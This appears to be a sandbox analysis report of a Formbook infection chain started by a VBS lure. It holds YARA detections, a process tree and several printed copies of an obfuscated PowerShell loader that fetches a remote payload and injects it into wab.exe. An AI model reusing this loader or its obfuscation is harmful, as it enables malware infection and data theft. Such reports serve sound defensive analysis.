Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246CEA80	12_2_246CEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2478FB76	12_2_2478FB76
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2478AB40	12_2_2478AB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_2470DBF9	12_2_2470DBF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_24786BD7	12_2_24786BD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246EFB80	12_2_246EFB80
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058BA4D9	16_2_058BA4D9
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058BA4E0	16_2_058BA4E0
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058B8780	16_2_058B8780
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058BA700	16_2_058BA700
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058C0E1A	16_2_058C0E1A
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058C0E60	16_2_058C0E60
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058D7E60	16_2_058D7E60

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 24705130 appears 36 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 24717E54 appears 88 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 2473EA12 appears 80 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 2474F290 appears 103 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 246BB970 appears 266 times

Source: amsi64_7500.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_7728.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7500, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7500
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7728

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe G
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe G
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\SysWOW64\replace.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe G	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe G	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: Yara match	File source: 00000005.00000002.1925873390.00000000091BB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1925751155.0000000008790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1919062447.0000000005DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2333966169.000002B347A73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Daarekisten113)$global:Culturology = [System.Text.Encoding]::ASCII.GetString($Analogies)$global:Spermatozoic=$Culturology.substring(328933,28828)<#Vendable Magnetoplasmadynamics Ghai
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Fastlandssoklerne235 $Nbenes $Grundfladernes), (Aperitiffer @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Trihedra = [AppDomain]::CurrentDomain.GetAssemb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Afficerendes)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Februaraften, $false).DefineType($udblokke,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Daarekisten113)$global:Culturology = [System.Text.Encoding]::ASCII.GetString($Analogies)$global:Spermatozoic=$Culturology.substring(328933,28828)<#Vendable Magnetoplasmadynamics Ghai

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF886F171C8 push esp; retf	2_2_00007FF886F171C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00FCD632 pushfd ; ret	5_2_00FCD641
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07650638 push eax; mov dword ptr [esp], ecx	5_2_07650AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07650AB8 push eax; mov dword ptr [esp], ecx	5_2_07650AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_084E28CD push ebx; ret	5_2_084E2B32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_084E2A6C push ebx; ret	5_2_084E2B32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_084E0230 pushfd ; ret	5_2_084E0235
